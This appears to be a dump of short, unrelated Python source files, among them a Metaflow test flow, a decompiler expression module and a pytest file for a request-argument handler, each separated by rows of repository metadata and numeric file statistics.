def send_mail(self, message):
raise NotImplementedError('Not implemented in abstract class')
| 28
| 70
| 0.714286
| 19
| 168
| 6.263158
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196429
| 168
| 5
| 71
| 33.6
| 0.881481
| 0.190476
| 0
| 0
| 0
| 0
| 0.253846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c79aa5aa747a960bb5fc0e0e1656eb9d01cca3d4
| 137
|
py
|
Python
|
src/coffee/__main__.py
|
Coffee2Bits/Coffee
|
e322633cd2fa76e5a9c28e67422a35c2ce98f559
|
[
"MIT"
] | null | null | null |
src/coffee/__main__.py
|
Coffee2Bits/Coffee
|
e322633cd2fa76e5a9c28e67422a35c2ce98f559
|
[
"MIT"
] | null | null | null |
src/coffee/__main__.py
|
Coffee2Bits/Coffee
|
e322633cd2fa76e5a9c28e67422a35c2ce98f559
|
[
"MIT"
] | null | null | null |
if sys.argv[0].endswith("__main__.py"):
sys.argv[0] = "coffee"
if __name__ == "__main__":
from aac import cli
cli.run_cli()
| 19.571429
| 39
| 0.627737
| 21
| 137
| 3.47619
| 0.666667
| 0.191781
| 0.219178
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018182
| 0.19708
| 137
| 7
| 40
| 19.571429
| 0.645455
| 0
| 0
| 0
| 0
| 0
| 0.181159
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c7acccc85b6c77f95d87bc8807297560686f209b
| 169
|
py
|
Python
|
django_gotolong/ftwhl/apps.py
|
ParikhKadam/gotolong
|
839beb8aa37055a2078eaa289b8ae05b62e8905e
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 15
|
2019-12-06T16:19:45.000Z
|
2021-08-20T13:22:22.000Z
|
django_gotolong/ftwhl/apps.py
|
ParikhKadam/gotolong
|
839beb8aa37055a2078eaa289b8ae05b62e8905e
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 14
|
2020-12-08T10:45:05.000Z
|
2021-09-21T17:23:45.000Z
|
django_gotolong/ftwhl/apps.py
|
ParikhKadam/gotolong
|
839beb8aa37055a2078eaa289b8ae05b62e8905e
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 9
|
2020-01-01T03:04:29.000Z
|
2021-04-18T08:42:30.000Z
|
from django.apps import AppConfig
from django_gotolong.ftwhl.views import start
class FtwhlConfig(AppConfig):
name = 'ftwhl'
def ready(self):
start()
| 16.9
| 45
| 0.710059
| 21
| 169
| 5.666667
| 0.714286
| 0.168067
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207101
| 169
| 9
| 46
| 18.777778
| 0.88806
| 0
| 0
| 0
| 0
| 0
| 0.029586
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
c7ad833dfcc0011cc0ece42fdedb4bcca4eb49ff
| 90
|
py
|
Python
|
library/test/test_compiler/testcorpus/02_expr_subscr.py
|
creativemindplus/skybison
|
d1740e08d8de85a0a56b650675717da67de171a0
|
[
"CNRI-Python-GPL-Compatible"
] | 278
|
2021-08-31T00:46:51.000Z
|
2022-02-13T19:43:28.000Z
|
library/test/test_compiler/testcorpus/02_expr_subscr.py
|
creativemindplus/skybison
|
d1740e08d8de85a0a56b650675717da67de171a0
|
[
"CNRI-Python-GPL-Compatible"
] | 9
|
2021-11-05T22:28:43.000Z
|
2021-11-23T08:39:04.000Z
|
library/test/test_compiler/testcorpus/02_expr_subscr.py
|
tekknolagi/skybison
|
bea8fc2af0a70e7203b4c19f36c14a745512a335
|
[
"CNRI-Python-GPL-Compatible"
] | 12
|
2021-08-31T07:49:54.000Z
|
2021-10-08T01:09:01.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
a[b]
a[b][c]
| 22.5
| 76
| 0.666667
| 16
| 90
| 3.75
| 0.75
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 90
| 3
| 77
| 30
| 0.759494
| 0.822222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c7b83cd9ca38c782fd2f16946afd38cc61c7ab7c
| 131
|
py
|
Python
|
accelbyte_py_sdk/core/_decorators.py
|
encyphered/accelbyte-python-sdk
|
09c1e989d7251de308150fdcd3119d662ca2d205
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/core/_decorators.py
|
encyphered/accelbyte-python-sdk
|
09c1e989d7251de308150fdcd3119d662ca2d205
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/core/_decorators.py
|
encyphered/accelbyte-python-sdk
|
09c1e989d7251de308150fdcd3119d662ca2d205
|
[
"MIT"
] | null | null | null |
def same_doc_as(source):
def wrapper(target):
target.__doc__ = source.__doc__
return target
return wrapper
| 21.833333
| 39
| 0.664122
| 16
| 131
| 4.8125
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.267176
| 131
| 5
| 40
| 26.2
| 0.802083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c7e26556181b4b58fcb3a44c4c4d25c537b317c9
| 87
|
py
|
Python
|
ngl_resum/__init__.py
|
MarcelBalsiger/ngl_resum
|
982139b18d1d6a3d0dff5c803761de067ea1c5a3
|
[
"MIT"
] | null | null | null |
ngl_resum/__init__.py
|
MarcelBalsiger/ngl_resum
|
982139b18d1d6a3d0dff5c803761de067ea1c5a3
|
[
"MIT"
] | null | null | null |
ngl_resum/__init__.py
|
MarcelBalsiger/ngl_resum
|
982139b18d1d6a3d0dff5c803761de067ea1c5a3
|
[
"MIT"
] | 1
|
2021-06-17T17:46:25.000Z
|
2021-06-17T17:46:25.000Z
|
__author__ = "Marcel Balsiger <marcel.balsiger@hotmail.com>"
from .ngl_resum import *
| 21.75
| 60
| 0.770115
| 11
| 87
| 5.636364
| 0.818182
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 87
| 3
| 61
| 29
| 0.805195
| 0
| 0
| 0
| 0
| 0
| 0.517241
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1be145cace88d41b9b221677fefd7b5e81864b38
| 116
|
py
|
Python
|
ex_package/numpy_function.py
|
JStox/first_package
|
a9455ddec18ef5e0a02f3e4224d680ebf37479ff
|
[
"MIT"
] | null | null | null |
ex_package/numpy_function.py
|
JStox/first_package
|
a9455ddec18ef5e0a02f3e4224d680ebf37479ff
|
[
"MIT"
] | null | null | null |
ex_package/numpy_function.py
|
JStox/first_package
|
a9455ddec18ef5e0a02f3e4224d680ebf37479ff
|
[
"MIT"
] | null | null | null |
import numpy as np
def array_of_zeros(n):
print(f'You requested an array of {n} zeros.')
return np.zeros(n)
| 23.2
| 50
| 0.689655
| 22
| 116
| 3.545455
| 0.681818
| 0.179487
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.198276
| 116
| 5
| 51
| 23.2
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
40013a4cc0576b913b89fcf7381fd5c98607d6f5
| 43
|
py
|
Python
|
quiz3/run_vector.py
|
pingsutw/sysprog21
|
a74594f4198ce16755a06bc3bb7222fe21e61fdb
|
[
"MIT"
] | null | null | null |
quiz3/run_vector.py
|
pingsutw/sysprog21
|
a74594f4198ce16755a06bc3bb7222fe21e61fdb
|
[
"MIT"
] | null | null | null |
quiz3/run_vector.py
|
pingsutw/sysprog21
|
a74594f4198ce16755a06bc3bb7222fe21e61fdb
|
[
"MIT"
] | null | null | null |
gcc -o vector -std=gnu11 vector.c
./vector
| 14.333333
| 33
| 0.72093
| 8
| 43
| 3.875
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.139535
| 43
| 2
| 34
| 21.5
| 0.783784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4014178bb65f1d1a3e60616927c1ab88e3a8b077
| 81
|
py
|
Python
|
default.py
|
emilsvennesson/kodi-fsgo
|
0217cb40e776ae88a8f25b84313214c3d1fb83e0
|
[
"CC0-1.0"
] | 3
|
2016-10-15T17:28:06.000Z
|
2021-05-05T23:23:06.000Z
|
default.py
|
snoopyjoe/kodi-fsgo
|
4148f49e356d036edb8f8eb8c41b14dd0cc1fc1c
|
[
"CC0-1.0"
] | 11
|
2016-09-30T18:46:21.000Z
|
2021-07-07T16:45:33.000Z
|
default.py
|
emilsvennesson/kodi-fsgo
|
0217cb40e776ae88a8f25b84313214c3d1fb83e0
|
[
"CC0-1.0"
] | 7
|
2016-10-09T03:01:31.000Z
|
2018-11-10T20:55:33.000Z
|
# -*- coding: utf-8 -*-
import addon
if __name__ == '__main__':
addon.run()
| 13.5
| 26
| 0.580247
| 10
| 81
| 3.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015625
| 0.209877
| 81
| 5
| 27
| 16.2
| 0.59375
| 0.259259
| 0
| 0
| 0
| 0
| 0.137931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
4041ea6c5916982f4171e5048c7fb9a26cba0fb3
| 2,679
|
py
|
Python
|
flows/many_big_low_entropy.py
|
tuulos/metaflow-datastore-tests
|
4acb2a5762246444ceff2b435de7c4062f063319
|
[
"Apache-2.0"
] | null | null | null |
flows/many_big_low_entropy.py
|
tuulos/metaflow-datastore-tests
|
4acb2a5762246444ceff2b435de7c4062f063319
|
[
"Apache-2.0"
] | null | null | null |
flows/many_big_low_entropy.py
|
tuulos/metaflow-datastore-tests
|
4acb2a5762246444ceff2b435de7c4062f063319
|
[
"Apache-2.0"
] | null | null | null |
import time
from metaflow import FlowSpec, step, profile
class ManyBig(FlowSpec):
"""
Test compression overhead with low-entropy artifacts.
Useful to compare against the high-entropy version since
the artifacts are about the same size.
"""
@step
def start(self):
nonce = str(time.time())
self.x00 = nonce + '00' * 50_000_000
self.x01 = nonce + '01' * 50_000_000
self.x02 = nonce + '02' * 50_000_000
self.x03 = nonce + '03' * 50_000_000
self.x04 = nonce + '04' * 50_000_000
self.x05 = nonce + '05' * 50_000_000
self.x06 = nonce + '06' * 50_000_000
self.x07 = nonce + '07' * 50_000_000
self.x08 = nonce + '08' * 50_000_000
self.x09 = nonce + '09' * 50_000_000
self.x10 = nonce + '10' * 50_000_000
self.x11 = nonce + '11' * 50_000_000
self.x12 = nonce + '12' * 50_000_000
self.x13 = nonce + '13' * 50_000_000
self.x14 = nonce + '14' * 50_000_000
self.x15 = nonce + '15' * 50_000_000
self.x16 = nonce + '16' * 50_000_000
self.x17 = nonce + '17' * 50_000_000
self.x18 = nonce + '18' * 50_000_000
self.x19 = nonce + '19' * 50_000_000
self.x20 = nonce + '20' * 50_000_000
self.x21 = nonce + '21' * 50_000_000
self.x22 = nonce + '22' * 50_000_000
self.x23 = nonce + '23' * 50_000_000
self.x24 = nonce + '24' * 50_000_000
self.x25 = nonce + '25' * 50_000_000
self.x26 = nonce + '26' * 50_000_000
self.x27 = nonce + '27' * 50_000_000
self.x28 = nonce + '28' * 50_000_000
self.x29 = nonce + '29' * 50_000_000
self.next(self.end)
@step
def end(self):
with profile('loading'):
self.x00 += '00'
self.x01 += '01'
self.x02 += '02'
self.x03 += '03'
self.x04 += '04'
self.x05 += '05'
self.x06 += '06'
self.x07 += '07'
self.x08 += '08'
self.x09 += '09'
self.x10 += '10'
self.x11 += '11'
self.x12 += '12'
self.x13 += '13'
self.x14 += '14'
self.x15 += '15'
self.x16 += '16'
self.x17 += '17'
self.x18 += '18'
self.x19 += '19'
self.x20 += '20'
self.x21 += '21'
self.x22 += '22'
self.x23 += '23'
self.x24 += '24'
self.x25 += '25'
self.x26 += '26'
self.x27 += '27'
self.x28 += '28'
self.x29 += '29'
if __name__ == '__main__':
ManyBig()
| 32.670732
| 60
| 0.48003
| 357
| 2,679
| 3.411765
| 0.282913
| 0.123153
| 0.197044
| 0.295567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.288983
| 0.379993
| 2,679
| 81
| 61
| 33.074074
| 0.444311
| 0.055618
| 0
| 0.027778
| 0
| 0
| 0.053871
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.027778
| 0
| 0.069444
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
40456936895bfb16d18f1432193b466508f15305
| 139
|
py
|
Python
|
linking/rust/using_ctypes.py
|
berquist/eg
|
4c368b12eaaffcf0af8032f10348cf8bc1c3957a
|
[
"Unlicense"
] | null | null | null |
linking/rust/using_ctypes.py
|
berquist/eg
|
4c368b12eaaffcf0af8032f10348cf8bc1c3957a
|
[
"Unlicense"
] | null | null | null |
linking/rust/using_ctypes.py
|
berquist/eg
|
4c368b12eaaffcf0af8032f10348cf8bc1c3957a
|
[
"Unlicense"
] | null | null | null |
import sys
import ctypes
from ctypes import c_uint32
lib = ctypes.cdll.LoadLibrary("target/debug/librust.so")
print(lib.addition(1, 2))
| 15.444444
| 56
| 0.769784
| 22
| 139
| 4.818182
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03252
| 0.115108
| 139
| 8
| 57
| 17.375
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.165468
| 0.165468
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
404ffc370efe30c9266874c2d67104d02de090a1
| 255
|
py
|
Python
|
wideq/__init__.py
|
kkakkong/wideq
|
a44428be07df2f94a7a250936d0026ad7109dda8
|
[
"MIT"
] | null | null | null |
wideq/__init__.py
|
kkakkong/wideq
|
a44428be07df2f94a7a250936d0026ad7109dda8
|
[
"MIT"
] | null | null | null |
wideq/__init__.py
|
kkakkong/wideq
|
a44428be07df2f94a7a250936d0026ad7109dda8
|
[
"MIT"
] | null | null | null |
"""Reverse-engineered client for the LG SmartThinQ API.
"""
from .core import * # noqa
from .client import * # noqa
from .dryer import * # noqa
from .washer import * # noqa
from .dehum import * # noqa
from .ac import * # noqa
__version__ = '0.0.1'
| 23.181818
| 55
| 0.666667
| 36
| 255
| 4.611111
| 0.527778
| 0.361446
| 0.421687
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014925
| 0.211765
| 255
| 10
| 56
| 25.5
| 0.810945
| 0.32549
| 0
| 0
| 0
| 0
| 0.03125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
40796837674ca76658869d55c2645634b98bc49a
| 89
|
py
|
Python
|
{{ cookiecutter.repo_service_reponame }}/tests/{{ cookiecutter.slug }}/test_{{ cookiecutter.slug }}.py
|
boilpy/boilpy
|
78f353a4b45e1df2e573993d686418dfc1f13cc8
|
[
"MIT"
] | 8
|
2018-11-03T12:50:42.000Z
|
2021-12-15T15:36:14.000Z
|
{{ cookiecutter.repo_service_reponame }}/tests/{{ cookiecutter.slug }}/test_{{ cookiecutter.slug }}.py
|
boilpy/boilpy
|
78f353a4b45e1df2e573993d686418dfc1f13cc8
|
[
"MIT"
] | 1
|
2021-09-03T16:55:39.000Z
|
2021-09-03T16:55:39.000Z
|
{{ cookiecutter.repo_service_reponame }}/tests/{{ cookiecutter.slug }}/test_{{ cookiecutter.slug }}.py
|
boilpy/boilpy
|
78f353a4b45e1df2e573993d686418dfc1f13cc8
|
[
"MIT"
] | null | null | null |
{% if cookiecutter.compat != "none" %}
from __future__ import absolute_import
{% endif %}
| 29.666667
| 38
| 0.719101
| 10
| 89
| 5.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 89
| 3
| 39
| 29.666667
| 0.766234
| 0
| 0
| 0
| 0
| 0
| 0.044444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
40892a0cc0778e4c11c7d5a1c6affca2c82d64fe
| 152
|
py
|
Python
|
src/nibetaseries/cli/tests/test_run.py
|
RaginSagan/NiBetaSeries
|
578748f36436253f62d73dd6d2984936788a1224
|
[
"MIT"
] | null | null | null |
src/nibetaseries/cli/tests/test_run.py
|
RaginSagan/NiBetaSeries
|
578748f36436253f62d73dd6d2984936788a1224
|
[
"MIT"
] | null | null | null |
src/nibetaseries/cli/tests/test_run.py
|
RaginSagan/NiBetaSeries
|
578748f36436253f62d73dd6d2984936788a1224
|
[
"MIT"
] | null | null | null |
from ..run import get_parser
def test_get_parser():
try:
get_parser().parse_args(['-h'])
except SystemExit:
print('success')
| 15.2
| 39
| 0.611842
| 19
| 152
| 4.631579
| 0.789474
| 0.306818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 152
| 9
| 40
| 16.888889
| 0.77193
| 0
| 0
| 0
| 0
| 0
| 0.059603
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.166667
| 0
| 0.333333
| 0.166667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
408ceb456f189907ffe35f7da23fc5abb9c5fc94
| 3,148
|
py
|
Python
|
tools/decompiler/expression.py
|
miniupnp/sundog
|
eb48447d1791e8bbd9ce4afe872a541dc67fcca1
|
[
"MIT"
] | 54
|
2017-01-31T08:14:04.000Z
|
2022-03-18T23:26:35.000Z
|
tools/decompiler/expression.py
|
miniupnp/sundog
|
eb48447d1791e8bbd9ce4afe872a541dc67fcca1
|
[
"MIT"
] | 9
|
2018-02-25T15:28:55.000Z
|
2021-10-15T14:29:44.000Z
|
tools/decompiler/expression.py
|
miniupnp/sundog
|
eb48447d1791e8bbd9ce4afe872a541dc67fcca1
|
[
"MIT"
] | 13
|
2017-01-29T12:38:26.000Z
|
2021-12-22T23:57:35.000Z
|
# Copyright (c) 2017 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
####### Expressions ########
class Expression:
'''Base class for expression node'''
pass
class OpExpression(Expression):
'''Operation'''
def __init__(self, op, args):
self.op = op
self.args = args
def __repr__(self):
return '%s(%s)' % (self.op, ', '.join(repr(s) for s in self.args))
class ConstantExpression(Expression):
'''Any kind of constant expression'''
pass
class ConstantIntExpression(ConstantExpression):
def __init__(self, val):
self.val = val
def __repr__(self):
return '0x%x' % (self.val)
class NilExpression(ConstantExpression):
def __init__(self):
pass
def __repr__(self):
return 'nil'
class FunctionCall(Expression):
'''Function call expression'''
def __init__(self, func, sargs, scope, meta=None):
self.func = func
self.sargs = sargs
self.scope = scope # lex level, or None for global
self.meta = meta
def __repr__(self):
seg = self.func[0].rstrip().decode()
scope = '' if self.scope is None else '[l%d]' % (self.scope)
name = ''
if self.meta is not None and self.meta.name is not None:
name = '_' + self.meta.name.partition('(')[0]
return '%s%s_%02X%s(%s)' % (scope, seg, self.func[1], name, ', '.join(repr(s) for s in self.sargs))
class TakeAddressOf(Expression):
'''Take address of expression'''
def __init__(self, addrof):
self.addrof = addrof
def __repr__(self):
return '&'+repr(self.addrof)
class VariableRef(Expression):
'''Base class for variable references'''
def __init__(self):
pass
def __repr__(self):
return '(variableref)'
class GlobalVariableRef(VariableRef):
'''Reference to a global variable'''
def __init__(self, segment, num):
self.segment = segment
self.num = num
def __repr__(self):
return '%s_G%x' % (self.segment.rstrip().decode(),self.num)
class LocalVariableRef(VariableRef):
'''Reference to a local variable of current function or encompassing functions'''
def __init__(self, func, num):
self.func = func
self.num = num
def __repr__(self):
return '%s_%02x_L%x' % (self.func[0].rstrip().decode(), self.func[1], self.num)
class ParameterRef(LocalVariableRef):
'''Reference to a parameter of current function or encompassing functions'''
def __repr__(self):
return '%s_%02x_P%x' % (self.func[0].rstrip().decode(), self.func[1], self.num)
class ReturnValueRef(LocalVariableRef):
'''Reference to a return value of current function or encompassing functions'''
def __repr__(self):
return '%s_%02x_R%x' % (self.func[0].rstrip().decode(), self.func[1], self.num)
class TempVariableRef(VariableRef):
'''Reference to a stack temporary'''
def __init__(self, num):
self.num = num
def __repr__(self):
return 'T%x' % (self.num)
| 29.420561
| 107
| 0.630877
| 398
| 3,148
| 4.766332
| 0.276382
| 0.050606
| 0.063785
| 0.089615
| 0.274644
| 0.254085
| 0.252504
| 0.195572
| 0.132314
| 0.132314
| 0
| 0.009065
| 0.229034
| 3,148
| 106
| 108
| 29.698113
| 0.772559
| 0.21061
| 0
| 0.333333
| 0
| 0
| 0.039419
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.30303
| false
| 0.060606
| 0
| 0.151515
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 4
|
408e0d09ad0f4d18f8865f5eeb93ce12cdc0b7d5
| 240
|
py
|
Python
|
fediverse/views/renderer/object/Tombstone.py
|
YuzuRyo61/CrossPlan
|
7bdc9b688885cd2bcce8bdc1f4d65b225beeb122
|
[
"MIT"
] | 8
|
2020-01-22T07:44:59.000Z
|
2020-05-17T18:32:06.000Z
|
fediverse/views/renderer/object/Tombstone.py
|
YuzuRyo61/CrossPlan
|
7bdc9b688885cd2bcce8bdc1f4d65b225beeb122
|
[
"MIT"
] | 4
|
2021-03-19T08:17:48.000Z
|
2021-06-10T19:53:08.000Z
|
fediverse/views/renderer/object/Tombstone.py
|
YuzuRyo61/CrossPlan
|
7bdc9b688885cd2bcce8bdc1f4d65b225beeb122
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.urls import reverse
def RenderTombstone(uuid):
return {
"type": "Tombstone",
"id": f"https://{settings.CP_ENDPOINT}{reverse('PostDetail', kwargs={'uuid': str(uuid)})}"
}
| 26.666667
| 98
| 0.654167
| 28
| 240
| 5.571429
| 0.75
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183333
| 240
| 8
| 99
| 30
| 0.795918
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.285714
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
4094d92375b762c59f4f3895b50ba28b3897da5c
| 5,775
|
py
|
Python
|
tests/test_args.py
|
felixnext/python-functown
|
71bfdf39116de0c7ff3acf1cd81a881efd865177
|
[
"MIT"
] | null | null | null |
tests/test_args.py
|
felixnext/python-functown
|
71bfdf39116de0c7ff3acf1cd81a881efd865177
|
[
"MIT"
] | null | null | null |
tests/test_args.py
|
felixnext/python-functown
|
71bfdf39116de0c7ff3acf1cd81a881efd865177
|
[
"MIT"
] | null | null | null |
from distutils.util import strtobool
import json
import os
import sys
import pytest
from azure.functions import HttpRequest
from functown import RequestArgHandler
from functown.errors import ArgError
def test_arghandler_convert():
'''Test the Parameter Conversion Methods to ensure they work properly'''
args = RequestArgHandler(None)
# direct pass through
out = args._convert("foo", "baz", required=True)
assert out == "baz"
out = args._convert("foo", "baz", required=True, map_fct=lambda x: x.upper())
assert out == "BAZ"
out = args._convert("foo", "baz", required=True, map_fct="upper")
assert out == "BAZ"
out = args._convert("foo", None, map_fct="upper")
assert out is None
# check default
out = args._convert("foo", None, default="baz")
assert out == "baz"
# bool conversion
out = args._convert("foo", "true", required=True, map_fct=lambda x: bool(strtobool(x)))
assert out is True
out = args._convert("foo", "false", required=True, map_fct=lambda x: bool(strtobool(x)))
assert out is False
out = args._convert("foo", "false", required=True, map_fct="bool")
assert out is False
out = args._convert("foo", "true", required=True, map_fct="bool")
assert out is True
# check allowed values
out = args._convert("foo", "bar", allowed=["foo", "bar", "baz"])
assert out == "bar"
out = args._convert("foo", "bar", allowed=["FOO", "BAR", "BAZ"], list_map="upper")
assert out == "bar"
out = args._convert("foo", "bar", allowed=["FOO", "BAR", "BAZ"], map_fct="upper")
assert out == "BAR"
